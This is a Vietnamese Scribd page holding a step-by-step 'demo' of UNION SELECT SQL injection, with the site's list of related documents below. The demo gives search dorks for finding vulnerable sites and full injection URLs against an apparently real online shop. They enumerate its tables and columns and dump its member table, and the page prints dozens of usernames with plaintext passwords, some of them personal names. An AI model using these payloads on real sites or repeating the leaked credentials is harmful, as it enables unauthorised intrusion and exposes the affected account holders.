Demo - SQL INJECTION

Uploaded by

21110098

0% found this document useful (0 votes)

5 views4 pages

Original Title

Demo_SQL INJECTION

Copyright

Available Formats

DOCX, PDF, TXT or read online from Scribd

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Report this Document

Copyright:

Available Formats

Download as DOCX, PDF, TXT or read online from Scribd

Flag for inappropriate content

Download as docx, pdf, or txt

0% found this document useful (0 votes)

5 views4 pages

Demo - SQL INJECTION

Uploaded by

21110098

Copyright:

Available Formats

Download as DOCX, PDF, TXT or read online from Scribd

Flag for inappropriate content

Download as docx, pdf, or txt

Jump to Page

You are on page 1of 4

Search inside document

CÁC BƯỚC TẤN CÔNG SỬ DỤNG LỆNH UNION SELECT

CÔNG CỤ HỖ TRỢ
Add-0n hackBar

1. Kiểm tra lỗi sql injection.

2. Tìm số cột mà câu truy vấn tạo ra.
3. Tìm cột chứa thông tin có thể khai thác được.
4. Xem phiên bản của CSDL và ngôn ngữ lập trình.
5. Xác định tên bảng chứa thông tin người quản trị.
6. Xác định tài khoản/mật khẩu của quản trị.
7. Truy cập vào phần giành cho quản trị viên.

1. Tìm kiếm trang web bị lỗi SQL

url inurl:product_detail php?id= site vn

Các từ khóa khác

index.php?id=
news.php id=
article.php?id=
games.php?id=
opinions.php?id=
pages.php?id=
product_detail.php?id=
view.php?id=
- Web không bị lỗi
tainguyenxanh.vn/product_detail.php?id=13
- Web bi loi
http://kentshop.com.vn/?frame=product_detail&id=241

2. KIỂM TRA SỐ CỘT CỦA TABLE MÀ SQL TRUY VẤN

kentshop.com.vn/?frame=product_detail&id=241 order by 17--

3. KIỂM TRA CỘT BỊ LỖI MÀ TA CÓ THỂ KHAI THÁC ĐƯỢC

kentshop.com.vn/?frame=product_detail&id=- 241 UNION SELECT
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 --
4. KIỂM TRA MỘT SỐ THÔNG TIN CỦA DATABASE
@@version, version()
database()
user
5.LIỆT KÊ CÁC BẢNG TRONG DATABASE
http://kentshop.com.vn/?frame=product_detail&id=-241 UNION
SELECT
1,2,unhex(hex(group_concat(table_name))),4,5,6,7,8,9,10,11,12,13,14,
15,16,17 from information_schema.tables where
table_schema=database()--
tbl_config,tbl_content,tbl_content_category,tbl_inchsize,tbl_manufact
urer,tbl_member,tbl_order,tbl_order_detail,tbl_product,tbl_product_c
ategory,tbl_product_new,tbl_product_special,tbl_user,tbl_visitor
6. LIỆT KÊ CÁC CỘT TRONG TABLE
http://kentshop.com.vn/?frame=product_detail&id=-241 UNION
SELECT
1,2,unhex(hex(group_concat(column_name))),4,5,6,7,8,9,10,11,12,13,1
4,15,16,17 from information_schema.columns where
table_name=CHAR(116, 98, 108, 95, 109, 101, 109, 98, 101, 114)—
Hoặc
http://kentshop.com.vn/?frame=product_detail&id=-241 UNION
SELECT
1,2,unhex(hex(group_concat(column_name))),4,5,6,7,8,9,10,11,12,13,1
4,15,16,17 from information_schema.columns where
table_name=0x116981089510910110998101114--

7.LẤY DỮ LIỆU TRONG BẢNG

http://kentshop.com.vn/?frame=product_detail&id=-241 UNION
SELECT
1,2,unhex(hex(group_concat(id,0x2f,uid,0x2f,pwd))),4,5,6,7,8,9,10,11,1
2,13,14,15,16,17 from tbl_member --
hoặc
http://kentshop.com.vn/?frame=product_detail&id=-241 UNION
SELECT
1,2,unhex(hex(group_concat(id,0x3a,uid,0x3a,pwd))),4,5,6,7,8,9,10,11,
12,13,14,15,16,17 from tbl_member --
71:cngocpham:123456,72:quach ngoc
bich:123456,54:cuong:123456,55:cuong1:123456,56:cuong2:123456,57
:cuong4:123456,58:Hãy nhập "Tên đăng nhập" !:123456,59:Pham Ngoc
Cuong
A:123456,60:Dang:123456,61:admin:123456,62:cuong121:123456,63:c
uongpham:123456,64:cuongpham1:123456,65:accacac:123456,66:bich
a:12345,67:123456:123456,68:cuong11:cuong11,69:accacac9:accacac9
,70:cuong0fgfd:cuong0fgfd,73:quach ngoc bich a:123456,74:quach
ngoc bich b:123456,75:Phạm Ngọc Cường:123456,76:Phạm Ngọc
Cường A:123456,77:Dang tran:123456,78:Pham
Cuong:123456,79:sds5:123456,80:cuong
demo:123456,81:dang:123456,82:Dken:123456,83:Tran
dang:123456,84:Mr dang:123456,85:Dang tran minh:123456,86:cường
a:123456,87:dang khoi:123456,88:fsdfdsfdsf:123456,89:Lưu Gia
Huy:123456

ASM1 DuAnMau
Document30 pages
ASM1 DuAnMau
nguyenduvipno1
No ratings yet
Cnweb
Document15 pages
Cnweb
Nguyễn Đức
No ratings yet
1 Chương 3 Chương 3: Kiểm thử SQL Injection: Dạng tấn công sử dụng câu lệnh select
Document3 pages
1 Chương 3 Chương 3: Kiểm thử SQL Injection: Dạng tấn công sử dụng câu lệnh select
no
No ratings yet
Baocao NH7
Document39 pages
Baocao NH7
Nguyễn Đăng HoàngÝ
No ratings yet
Câu Hỏi Thiết Kế Website
Document6 pages
Câu Hỏi Thiết Kế Website
Nga Lê
No ratings yet
Đề cương TKW
Document6 pages
Đề cương TKW
Nguyễn Hiền
No ratings yet
Tài Liệu Đặc Tả Yêu Cầu Phần Mềm: (Software Requirement Specification - SRS)
Document11 pages
Tài Liệu Đặc Tả Yêu Cầu Phần Mềm: (Software Requirement Specification - SRS)
Tuấn Lê Sanh Hoàng
No ratings yet
Chuong1 - 20180279 - POUTH LYHEANG
Document12 pages
Chuong1 - 20180279 - POUTH LYHEANG
ពិភពរឿង និយាយខ្មែរ
No ratings yet
LTWeb Bai10
Document205 pages
LTWeb Bai10
Thêm Nguyễn Thị
No ratings yet
CSE485 - Bai 4
Document5 pages
CSE485 - Bai 4
nolat1234hh
No ratings yet
Bai Tap Quan Ly San Pham
Document3 pages
Bai Tap Quan Ly San Pham
khoi doan
No ratings yet
Bài thực hành phân quyền người dùng trong ứng dụng Web
Document26 pages
Bài thực hành phân quyền người dùng trong ứng dụng Web
pham dat
No ratings yet
DATN
Document66 pages
DATN
mibhd4
No ratings yet
Lab 08
Document13 pages
Lab 08
Le The Nam
No ratings yet
Xây Dựng Website Bán Hàng Quần Áo Online: Khoa Công Nghệ Thông Tin
Document34 pages
Xây Dựng Website Bán Hàng Quần Áo Online: Khoa Công Nghệ Thông Tin
letrong407
No ratings yet
Outline v3
Document12 pages
Outline v3
Đạt Nguyễn
No ratings yet
BaiTapThucHanhTMDT 24
Document57 pages
BaiTapThucHanhTMDT 24
Bảo Nguyễn Duy
No ratings yet
Đồ Án Môn Học Công Nghệ Phần Mềm
Document56 pages
Đồ Án Môn Học Công Nghệ Phần Mềm
nghthai02
No ratings yet
APTECH Seminar PHP + AJAX
Document101 pages
APTECH Seminar PHP + AJAX
skylinekk
No ratings yet
Cnwat. Bài Tập 4. Php Và Csdl
Document64 pages
Cnwat. Bài Tập 4. Php Và Csdl
Cu Hung
No ratings yet
Joomla - Tips
Document9 pages
Joomla - Tips
Hà Đinh Hồng
No ratings yet
Thuc Hanh CSDL
Document12 pages
Thuc Hanh CSDL
lethao06122004
No ratings yet
Báo Cáo ƯD PP
Document35 pages
Báo Cáo ƯD PP
Huy Bách
No ratings yet
Đề cương ôn tập Quản trị nội dung và chăm sóc website
Document7 pages
Đề cương ôn tập Quản trị nội dung và chăm sóc website
Phương Quỳnh Nguyễn
No ratings yet
Bài 01. Cài Đặt Kali Linux Và Máy Chủ Web
Document33 pages
Bài 01. Cài Đặt Kali Linux Và Máy Chủ Web
MèoConĐiHọc
No ratings yet
DAFIXED
Document21 pages
DAFIXED
Tiên Quách
No ratings yet
Software Requirement Production
Document42 pages
Software Requirement Production
qui phuoc
No ratings yet
Assignment
Document3 pages
Assignment
Tuấn Anh Nguyễn
No ratings yet
Template2 SDD
Document10 pages
Template2 SDD
Đặng Thành Chung
No ratings yet
Powerpoint
Document150 pages
Powerpoint
lê duy linh
No ratings yet
Tìm Hiểu Về Api, Các Giao Thức, Lựa Chọn Trong Các Giao Thức Api Và Demo Cách Hoạt Động Api
Document24 pages
Tìm Hiểu Về Api, Các Giao Thức, Lựa Chọn Trong Các Giao Thức Api Và Demo Cách Hoạt Động Api
tduc1213
No ratings yet
Website BanMayViTinh
Document3 pages
Website BanMayViTinh
Trần Vương Duy
No ratings yet
NguyenHuyHoang 17021191
Document13 pages
NguyenHuyHoang 17021191
ngoccocdunghai
No ratings yet
Baocao PMMNM
Document27 pages
Baocao PMMNM
dongbggb3
No ratings yet
Laravel Slides03
Document132 pages
Laravel Slides03
nam lê
No ratings yet
E Commerce Chapter 04
Document33 pages
E Commerce Chapter 04
34 - Nguyễn Thị Thuận Ninh
No ratings yet
ÔN TẬP
Document4 pages
ÔN TẬP
Nguyễn Hữu Thanh
No ratings yet
Nh1916 ThaiVanTho Lab11
Document8 pages
Nh1916 ThaiVanTho Lab11
Heo Cục cứt
No ratings yet
Nhóm 19
Document19 pages
Nhóm 19
Wu Nan
No ratings yet
Java Web
Document9 pages
Java Web
Bùi Minh Công B18DCCN056-
No ratings yet
Nguyenvannamdoanvb
Document14 pages
Nguyenvannamdoanvb
nguyenhuuvu10111977
No ratings yet
Tai Liu DC T Yeu Cu PHN MM Ban Han
Document31 pages
Tai Liu DC T Yeu Cu PHN MM Ban Han
buihoanglong1901
No ratings yet
Mota
Document32 pages
Mota
Thanh Việt
No ratings yet
Trang web thương mại điện tử bán quần áo
Document14 pages
Trang web thương mại điện tử bán quần áo
Trần Quang Hưng
No ratings yet
Bai Thuc Hanh So 2
Document11 pages
Bai Thuc Hanh So 2
khởi trần fr
No ratings yet
Đ Án Web Nâng Cao
Document30 pages
Đ Án Web Nâng Cao
Hoàng Tùng
No ratings yet
Báo Cáo Cellphones
Document21 pages
Báo Cáo Cellphones
Ff Tt
No ratings yet
BT PHP Basic
Document14 pages
BT PHP Basic
pthuynh709
No ratings yet
Lab 1 - HTML, CSS, Javascript
Document19 pages
Lab 1 - HTML, CSS, Javascript
Đức Tài
No ratings yet
Slide 4 - Spring Beans
Document32 pages
Slide 4 - Spring Beans
nguyenminhthuan12a8tp1
No ratings yet
0. Cấu trúc. Đề thi Tốt nghiệp 2
Document3 pages
0. Cấu trúc. Đề thi Tốt nghiệp 2
Hồng Phan Thị
No ratings yet
Ebook Ecshop
Document56 pages
Ebook Ecshop
hankhach123
No ratings yet
Bangiaydep
Document47 pages
Bangiaydep
06 Phạm Xuân Cường
No ratings yet
Báo Cáo Đ Án Chuyên Ngành (Võ Nguyên L C - 18CNTT3)
Document36 pages
Báo Cáo Đ Án Chuyên Ngành (Võ Nguyên L C - 18CNTT3)
code Khamko
No ratings yet
Chương I+2+3
Document37 pages
Chương I+2+3
hoàng Phùng
No ratings yet
Phần Mềm Mã Nguồn Mở Báo Cáo Chuyên Đề 2021
Document28 pages
Phần Mềm Mã Nguồn Mở Báo Cáo Chuyên Đề 2021
saru01032003
No ratings yet
Tài Liệu Mô Tả Kĩ Thuật 1office
Document10 pages
Tài Liệu Mô Tả Kĩ Thuật 1office
Đạt Nguyễn
No ratings yet
Hack SQL Injection
Document14 pages
Hack SQL Injection
Gà Con
No ratings yet
Thay Đổi Cách Sống
From Everand
Thay Đổi Cách Sống
Ma Trọng Thẩm
No ratings yet
Hoạch định Nguồn lực Doanh Nghiệp ERP
From Everand
Hoạch định Nguồn lực Doanh Nghiệp ERP
Phong Nguyễn Như
No ratings yet